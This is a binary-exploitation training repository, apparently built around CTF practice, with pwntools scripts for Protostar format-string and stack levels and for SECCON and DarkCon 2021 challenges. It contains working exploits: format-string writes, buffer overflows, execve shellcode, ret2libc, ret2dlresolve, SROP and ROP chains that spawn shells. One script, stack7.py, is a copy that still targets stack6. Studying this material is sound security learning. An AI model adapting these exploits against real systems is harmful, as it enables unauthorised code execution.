pattern_search(sys.argv[1]) 106 | print( 107 | "Pattern {0} first occurrence at " 108 | "position {1} in pattern.".format(sys.argv[1], found) 109 | ) 110 | except WasNotFoundException as e: 111 | print(e) 112 | sys.exit(1) 113 | except (ValueError, TypeError): 114 | print("Unable to convert hex input 
for searching. Invalid hex?") 115 | sys.exit(1) 116 | -------------------------------------------------------------------------------- /protostar/format/0format.exp: -------------------------------------------------------------------------------- 1 | ./format0 $(python -c 'print "%64s\xef\xbe\xad\xde"') 2 | -------------------------------------------------------------------------------- /protostar/format/1format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | #context.log_level = 'DEBUG' 5 | 6 | payload = b'\x38\x96\x04\x08' 7 | payload += b'BBBB' 8 | payload += b' %141$n'*200 9 | 10 | p = process(['./format1',payload],stdin=PTY) 11 | print('\n'+p.recv().decode('latin-1').split('\n')[-2][-31:]) 12 | 13 | 14 | # ./format1 "$(python -c "print ''+'\x38\x96\x04\x08'+'BBBBBBB'+'%141\$n '*200")" 15 | -------------------------------------------------------------------------------- /protostar/format/2format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | 4 | #context.log_level = 'DEBUG' 5 | p = process('./format2') 6 | 7 | payload = '\xe4\x96\x04\x08' # 0x080496e4 # 4 bytes 8 | payload += 'C'*60 # 60 bytes 9 | payload += '%4$n' 10 | 11 | p.sendline(payload) 12 | print('\n'+p.recv().decode('latin-1')) 13 | -------------------------------------------------------------------------------- /protostar/format/3format.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | ''' 3 | 16930116 - 0x01025544 --> target need to be 4 | ''' 5 | 6 | payload = b'\xf4\x96\x04\x08' # 080496f4 --> 4 bytes 7 | payload += b'%12$16930112x' # 16930116 - 4 --> 16930112 8 | payload += b'%12$n' # so total 16930116 which is 0x01025544 in hex 9 | 10 | open('payload3','wb').write(payload) 11 | 12 | import os 13 | os.system('./format3 < payload3') 14 | 
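--------------------------------------------------------------------------------
/protostar/format/4format.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
"""
Two-half %n write: leave 0x080484b4 (`hello`) in the 4-byte slot at
0x8049724, low 16 bits first, high 16 bits second.

The author calls the slot exit_plt; for a plain %n overwrite it has to be
a writable pointer slot, so presumably exit's GOT entry -- confirm with
`objdump -R ./format4`.
"""
import subprocess

exit_plt = 0x8049724  # slot overwritten (low half), \x24\x97\x04\x08
hello = 0x80484b4     # value to land there,        \xb4\x84\x04\x08

lo = hello & 0xffff   # 0x84b4 -> first %n
hi = hello >> 16      # 0x0804 -> second %n

# Two 4-byte addresses are already printed before the first %x, so the
# first field pads the running count from 8 up to 0x84b4.
width1 = lo - 8                  # 33964: 8 + 33964 = 0x84b4
# %n stores the *running* count, so the second field must advance it from
# 0x84b4 to a value whose low 16 bits are 0x0804: 0x10804.
width2 = (hi - lo) & 0xffff      # 33616: 0x84b4 + 33616 = 0x10804

payload = exit_plt.to_bytes(4, 'little')          # 0x8049724 --> low 16 bits
payload += (exit_plt + 2).to_bytes(4, 'little')   # 0x8049726 --> high 16 bits
payload += b'%4$' + str(width1).encode() + b'x'
payload += b'%4$n'
payload += b'%5$' + str(width2).encode() + b'x'
payload += b'%5$n'
# Both writes use a full-width %n (4 bytes), so the second one also spills
# 0x0001 into 0x8049728..0x8049729 after the slot.  %hn would confine each
# write to 2 bytes if that spill ever matters.

with open('payload4', 'wb') as f:
    f.write(payload)

# Same as `./format4 < payload4`, without going through a shell.
with open('payload4', 'rb') as f:
    subprocess.run(['./format4'], stdin=f)


--------------------------------------------------------------------------------
/protostar/format/challenge binaries/format0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format0
--------------------------------------------------------------------------------
/protostar/format/challenge binaries/format1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format1
--------------------------------------------------------------------------------
/protostar/format/challenge binaries/format2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format2
--------------------------------------------------------------------------------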
/protostar/format/challenge binaries/format3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format3 -------------------------------------------------------------------------------- /protostar/format/challenge binaries/format4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/format/challenge binaries/format4 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack0 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack1 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack2 -------------------------------------------------------------------------------- /protostar/stack/challenge binaries/stack3: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack3
--------------------------------------------------------------------------------
/protostar/stack/challenge binaries/stack4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack4
--------------------------------------------------------------------------------
/protostar/stack/challenge binaries/stack5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack5
--------------------------------------------------------------------------------
/protostar/stack/challenge binaries/stack6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack6
--------------------------------------------------------------------------------
/protostar/stack/challenge binaries/stack7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/protostar/stack/challenge binaries/stack7
--------------------------------------------------------------------------------
/protostar/stack/stack0.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
"""stack0: send more input than the buffer holds and print the reply."""
from pwn import *

io = process('./stack0')

# 100 bytes of 'A' -- enough to run past the input buffer; whatever sits
# right after it gets clobbered, which is all this level checks.
overflow = b'A' * 100
io.sendline(overflow)

print(io.recv().decode())
--------------------------------------------------------------------------------
/protostar/stack/stack1.exp:
--------------------------------------------------------------------------------
# python2 print statement; 64 bytes of padding, then 'dcba' lands in the
# overwritten word as 0x61626364 (little-endian).
./stack1 $(python -c "print 'A'*64 + 'dcba'")
--------------------------------------------------------------------------------
/protostar/stack/stack2.exp:
--------------------------------------------------------------------------------
# python2 print statement; 64 bytes of padding, then \n\r\n\r == 0x0d0a0d0a
# little-endian.  $(...) strips only *trailing* newlines and the string ends
# in \r, so the value reaches the environment intact.  Source/`eval` this,
# don't run it in a subshell, or the export is lost.
export GREENIE=$(python -c "print 'A'*64 + '\n\r\n\r'")
--------------------------------------------------------------------------------
/protostar/stack/stack3.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
"""stack3: 64 bytes of padding, then the address control transfers to."""
from pwn import *

io = process('./stack3')

padding = b'A' * 64            # fills the buffer
target = p32(0x8048424)        # ret addr (author's wording); little-endian
io.sendline(padding + target)

print(io.recv().decode())
--------------------------------------------------------------------------------
/protostar/stack/stack4.exp:
--------------------------------------------------------------------------------
# python2 print statement; 76 bytes of padding, then 0x080483f4 little-endian
# as the 4 bytes that overwrite the saved return address.
python -c "print 'A'*76 + '\xf4\x83\x04\x08'" | ./stack4
--------------------------------------------------------------------------------
/protostar/stack/stack5.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
"""
stack5: classic NOP sled + shellcode on the stack.

Layout (80 bytes): 30 NOPs, 28-byte shellcode, 'A' padding up to 76, then
0xffffd58c little-endian as the return address -- a hard-coded guess that
has to land inside the sled, so this only works with ASLR off and the
stack laid out exactly as it was when the address was taken.
"""
from pwn import *

#context.log_level = 'DEBUG'
context.binary = ELF('./stack5')
io = process()

# xor eax,eax; push eax; push "//sh"; push "/bin"; mov ebx,esp;
# mov ecx,eax; mov edx,eax; mov al,0xb; int 0x80          -> execve("/bin//sh",0,0)
# xor eax,eax; inc eax; int 0x80                           -> exit(0)
shellcode = (
    b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3'
    b'\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'
)

payload = b'\x90' * 30 + shellcode
payload += b'A' * (76 - len(payload))
payload += b'\x8c\xd5\xff\xff'          # 0xffffd58c, guessed sled address

io.send(payload)
#open('payload_5','wb').write(payload)
io.interactive()

# The author notes this does not pop a shell when run from the script --
# most likely because the environment/argv pwntools sets up shifts the
# stack so 0xffffd58c no longer hits the sled.  Workaround: uncomment the
# open() line above to dump the payload, then run
#   (cat payload_5;cat) | ./stack5
# (the trailing `cat` keeps stdin open for the shell).
--------------------------------------------------------------------------------
/protostar/stack/stack6.py:
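--------------------------------------------------------------------------------
#!/usr/bin/python3
"""
stack6: ret2libc -- return into system("/bin/sh") using hard-coded libc
addresses.

Only valid with ASLR disabled and this exact libc build: re-read the base
from /proc/<pid>/maps (or `info proc mappings` in gdb) and the two offsets
from the libc you actually have before trusting these numbers.
"""
from pwn import *

p = process('./stack6')

libc_base = 0xf7dbb000           # libc mapping base (ASLR off)
binsh = libc_base + 0x18f924     # "/bin/sh" string inside libc
system = libc_base + 0x00045160  # system()

# 80 bytes reach the saved return address; then a fake call frame:
#   system | return address for when system() returns (0 -> crash after
#   the shell exits, which is fine here) | pointer to "/bin/sh"
payload = b'A'*80
payload += p32(system)
payload += p32(0x0)
payload += p32(binsh)

p.sendline(payload)
p.interactive()

--------------------------------------------------------------------------------
/protostar/stack/stack7.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
"""
stack7 -- NOTE(review): this file is a verbatim copy of stack6.py and still
launches ./stack6.  stack7 presumably needs its own target and offsets;
nothing in the repo pins them, so the script is left as-is rather than
guessed at.  Same ASLR-off / exact-libc caveats as stack6.py.
"""
from pwn import *

p = process('./stack6')          # NOTE(review): should this be ./stack7 ?

libc_base = 0xf7dbb000           # libc mapping base (ASLR off)
binsh = libc_base + 0x18f924     # "/bin/sh" string inside libc
system = libc_base + 0x00045160  # system()

# 80 bytes of padding, then system | fake return address | &"/bin/sh"
payload = b'A'*80
payload += p32(system)
payload += p32(0x0)
payload += p32(binsh)

p.sendline(payload)
p.interactive()

--------------------------------------------------------------------------------
/pwn 101 TamilCTF session.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/pwn 101 TamilCTF session.pdf
--------------------------------------------------------------------------------
/pwn101 banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/pwn101 banner.png
--------------------------------------------------------------------------------
/pwncode.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
"""
Generate a pwntools solve-script skeleton for a challenge binary.

Usage: pwncode <binary> [solve-script]   (script name defaults to solve.py)

The skeleton is written to the current directory and opened in Sublime
(`subl`).  Copy this file to /usr/bin/pwncode to use it from anywhere.
"""
import subprocess
import sys
from pathlib import Path

from pwn import log

if len(sys.argv) < 2:
    log.critical('pass arguments man!!!')
    log.info('argv [1] => binary file')
    log.info('argv [2] => solve script name (optional)')
    sys.exit(1)

binary = sys.argv[1]
# The original fell into a bare `except:` with `binary` unbound when argv[1]
# was missing (NameError); check the argument count explicitly instead.
exploit_script = sys.argv[2] if len(sys.argv) > 2 else 'solve.py'

# {binary!r} emits a proper Python string literal, so a name containing a
# quote or backslash cannot break the generated script.  For ordinary
# names the output is identical to the old '{binary}'.
template = f'''#!/usr/bin/python3
from pwn import *

elf = context.binary = ELF({binary!r},checksec=False)
rop = ROP(elf)
p = elf.process()

## pwncode[H4ppy_pWn1nG]
'''

target = Path.cwd() / exploit_script

# Never silently clobber a solve script that may already contain work.
if target.exists():
    log.critical(f'{target} already exists, refusing to overwrite it')
    sys.exit(1)

target.write_text(template)

# argv list rather than an f-string fed to os.system(): the path is user
# controlled and may contain spaces or shell metacharacters.
try:
    subprocess.run(['subl', str(target)])
except FileNotFoundError:
    log.warning(f'subl not found; skeleton written to {target}')
# a small script to generate solve.py
# copy this file to /usr/bin/pwncode

--------------------------------------------------------------------------------
/random_pwn_challs/ret2dlresolve/seccon_2021_kasu_bof.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
"""
SECCON 2021 "kasu_bof": ret2dlresolve via pwntools.

The overflow reaches the saved EIP after 136 bytes.  The chain calls gets()
to drop the forged relocation/symbol records at dlresolve.data_addr, then
enters the PLT resolver with our relocation index so it "resolves" system
and calls it with "/bin/sh".  Binary: see the link at the bottom.
"""
from pwn import *

elf = context.binary = ELF('./chall')  # 136 EIP
p = process()
rop = ROP(elf)
# p = remote('hiyoko.quals.seccon.jp',9001)

dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A'*136)                # padding up to the saved return address
rop.gets(dlresolve.data_addr)   # stage 2: gets() reads the fake structs in
rop.ret2dlresolve(dlresolve)    # stage 3: resolver call with our reloc index
log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)
# Sent twice in the original; presumably one copy is consumed by a read that
# is still pending in the vulnerable function -- verify against the binary.
p.sendline(dlresolve.payload)

p.interactive()

# https://github.com/sajjadium/ctf-archives/raw/main/SECCON/2021/pwn/kasu_bof/chall
# challenge download link ^

--------------------------------------------------------------------------------
/random_pwn_challs/sigrop/DarkCon_2021_easy_rop.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3
"""
DarkCon 2021 "easy-rop": SROP.

Chain: gets(bss) reads "/bin/sh" into .bss, then rax = 15 (rt_sigreturn) +
syscall makes the kernel load the forged SigreturnFrame that follows, which
resumes at a syscall gadget with rax = 0x3b / rdi = bss / rsi = rdx = 0,
i.e. execve("/bin/sh", 0, 0).

The 0x4xxxxx gadget addresses and the direct use of elf.sym['gets'] suggest
a static, non-PIE binary -- confirm with checksec, and re-find the gadgets
(ROPgadget / ropper) if the binary is ever rebuilt.
"""
from pwn import *

elf = context.binary = ELF('easy-rop',checksec=False)
p = elf.process()

pop_rax = 0x00000000004175eb
pop_rdi = 0x000000000040191a
syscall = 0x000000000041e394
bss = 0x00000000004c2220       # writable scratch space for "/bin/sh"

# Register state the kernel restores on rt_sigreturn.
frame = SigreturnFrame()
frame.rax = 0x3b        # SYS_execve
frame.rdi = bss         # pathname -> "/bin/sh" written by gets() below
frame.rsi = 0x0         # argv = NULL
frame.rdx = 0x0         # envp = NULL
frame.rip = syscall     # resume at a syscall gadget

payload = b'A'*72                   # padding to the saved return address
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(elf.sym['gets'])     # gets(bss): reads the second line we send
payload += p64(pop_rax)             # gets() returns here
payload += p64(0xf)                 # sig return syscall (SYS_rt_sigreturn)
payload += p64(syscall)
payload += bytes(frame)             # sigcontext the kernel pops on sigreturn

with open('payload', 'wb') as f:    # keep a copy for (cat payload; cat) | ./easy-rop
    f.write(payload)
p.sendline(payload)
p.sendline(b'/bin/sh\x00')
p.interactive()

# https://github.com/sajjadium/ctf-archives/raw/main/darkCON/2021/pwn/Easy-ROP/easy-rop
# challenge download link ^

--------------------------------------------------------------------------------
/roadmap.md:
--------------------------------------------------------------------------------
### Road map to learn binary exploitation

wait...

--------------------------------------------------------------------------------
/stack_master/README.md:
--------------------------------------------------------------------------------
| Challenges | Download | Writeup | Exploit |
|-|-|-|-|
|easy rop| [link](https://github.com/jopraveen/exploit-development/raw/main/stack_master/easy-rop/easy-rop)| | [exploit.py](easy-rop/exploit.py) |
|string editor 1| | | |
|string editor 2| | | |
|guess| | | |
|moving signals| | | |
|some really ordinary program| | | |

--------------------------------------------------------------------------------
/stack_master/easy-rop/easy-rop:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jopraveen/exploit-development/23e2e13f21cc40e48e9f72cbff9eeb0d7f60716b/stack_master/easy-rop/easy-rop
--------------------------------------------------------------------------------
/stack_master/easy-rop/exploit.py:
--------------------------------------------------------------------------------
"""
stack_master "easy-rop": execve("/bin/sh", 0, 0) through a ROP chain that
first writes the string into .data, then loads the syscall registers.

    execve('/bin/sh',0,0);
    rax = 59, rdi = &"/bin/sh", rsi = 0, rdx = 0, syscall
"""
from pwn import *

elf = context.binary = ELF('easy-rop',checksec=False)
rop = ROP(elf)
p = elf.process()

# required things
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
pop_rax = rop.find_gadget(['pop rax','ret'])[0]
syscall = rop.find_gadget(['syscall','ret'])[0]
# Hand-picked gadgets for this exact binary; re-find them (ROPgadget /
# ropper) if it is rebuilt.  The names are the author's: the chain below
# only works if mov_rsi_rax stores rax at [rsi] and mov_rdi_rsi copies rsi
# into rdi -- verify both in a disassembler before reusing them.
pop_rsi = 0x000000000040f4be
pop_rdx = 0x000000000040181f
mov_rdi_rsi = 0x000000000047695e
mov_rsi_rax = 0x0000000000481e65
data_section = 0x004c00e0      # writable scratch for the "/bin/sh\0" qword

# Stage 1: rax = "/bin/sh\0" as a little-endian qword, rsi = .data slot,
# store it there and copy the pointer into rdi.
write_string = [
    pop_rax, u64(b'/bin/sh\x00'),
    pop_rsi, data_section,
    mov_rsi_rax,
    mov_rdi_rsi,
]
# Stage 2: rax = SYS_execve, rsi = rdx = 0, syscall.
do_execve = [
    pop_rax, 0x3b,
    pop_rsi, 0x0,
    pop_rdx, 0x0,
    syscall,
]

padding = b'A' * 72            # up to the saved return address
payload = flat(padding, *write_string, *do_execve)

input()                        # pause so a debugger can be attached first
p.sendlineafter('name:', payload)
p.interactive()

# execve('/bin/sh',0,0);
# rax = 59
# rsi = 0
# rdx = 0

# rdi = '/bin/sh' -> pointer
# syscall
--------------------------------------------------------------------------------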